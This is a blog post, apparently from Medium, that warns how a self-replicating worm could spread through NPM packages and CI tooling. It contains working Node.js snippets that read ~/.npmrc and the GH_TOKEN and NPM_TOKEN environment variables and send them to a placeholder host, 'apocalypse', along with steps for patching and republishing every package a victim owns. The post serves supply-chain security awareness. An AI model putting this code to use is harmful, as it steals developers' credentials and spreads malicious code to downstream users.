Distributing a self-replicating malicious code using NPM

Security risks that come with highly automated systems

Obtaining NPM credentials

const fs = require('fs');
const path = require('path');
const querystring = require('querystring');
const http = require('http');
const npmrcPath = path.resolve(process.env.HOME, '.npmrc');
const npmrc = fs.readFileSync(npmrcPath, 'utf8');
const targetData = querystring.stringify({
npmrc
});
const endpointUrl = 'http://apocalypse/?' + targetData;http.get(endpointUrl);
  1. Find out whoami & retrieve all packages owned by the user.
  2. Download every package & patch it using the above script.
  3. Publish the “patch”.

Node security project

Dr. Evil

  • A malicious code is included in a PR against a popular dependency. During the PR review process the malicious code has not been observed or has not been identified as malicious.
  • An author of a popular package intentionally distributes malicious code.
Using these “open-source contributions”

travis & semantic-release & greenkeeper

npm install --save my-pkg@1.0.0
const querystring = require('querystring');
const http = require('http');
const targetData = querystring.stringify({
ghtoken: process.env.GH_TOKEN,
npmtoken: process.env.NPM_TOKEN
});
const endpointUrl = 'http://apocalypse/?' + targetData;http.get(endpointUrl);
The outcome is: shit hits the fan.

How to fix this?

Bonus: Update your Travis-CI ENV variables

export GITHUB_USER=gajus
export GITHUB_TOKEN=...
travis login
travis repos -o $GITHUB_USER -a --no-interactive | xargs -n1 travis env set GH_TOKEN $GITHUB_TOKEN --private --repo

--

--

Founder, engineer interested in JavaScript, PostgreSQL and DevOps. Follow me on Twitter for outbursts about startups & engineering. https://twitter.com/kuizinas

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Gajus Kuizinas

Founder, engineer interested in JavaScript, PostgreSQL and DevOps. Follow me on Twitter for outbursts about startups & engineering. https://twitter.com/kuizinas